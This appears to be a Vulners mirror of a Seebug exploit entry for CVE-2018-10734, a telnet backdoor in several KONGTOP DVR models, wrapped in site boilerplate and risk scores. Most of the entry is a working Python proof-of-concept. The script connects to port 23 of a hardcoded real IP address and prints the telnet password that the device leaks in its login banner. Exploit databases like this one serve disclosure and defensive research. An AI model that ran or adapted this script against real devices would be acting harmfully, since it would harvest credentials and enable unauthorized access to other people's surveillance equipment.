Lucene search
K

KONGTOP DVR后门分析(CVE-2018-10734)

🗓️ 10 May 2018 00:00:00Reported by My SeebugType 
seebug
 seebug
🔗 www.seebug.org👁 104 Views

Kongtop DVR Telnet后门分析 (CVE-2018-10734

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Multiple KONGTOP DVR Products Information Disclosure Vulnerability
10 May 201800:00
cnvd
CVE
CVE-2018-10734
8 May 201807:00
cve
Cvelist
CVE-2018-10734
8 May 201807:00
cvelist
EUVD
EUVD-2018-2804
7 Oct 202500:30
euvd
NVD
CVE-2018-10734
8 May 201807:29
nvd
Prion
Default credentials
8 May 201807:29
prion

                                                import socket

'''
@Author: mosin
@Date: 2018-05-04
 Description: CVE-2018-10734
 KONGTOP DVR backdoor POC
 The all DVR Using HiSilicon firmware.
Vulnerability version:
    KONGTOP D303 DVR
    KONGTOP D305 DVR
    KONGTOP D403 DVR
    KONGTOP A303 DVR 
    KONGTOP A403 DVR 
Linux kernel��hi3515-hi3531
'''

HOST = "122.117.153.41"

def check():
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((HOST,23))
    passwd = sock.recv(1024)
    passwd = sock.recv(1024)
    if "passwd:" in passwd:
        print "[*] YES,KONGTOP DVR Vulnerability!\n"
        passwd = passwd.replace("(none) login:","")
        
        print "[+] Telnet Pass: " + passwd 
    else:
        print "[-] Sorry,NO Found!"


if __name__ =='__main__':
    check()

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 May 2018 00:00Current
9.7High risk
Vulners AI Score9.7
EPSS0.00386
104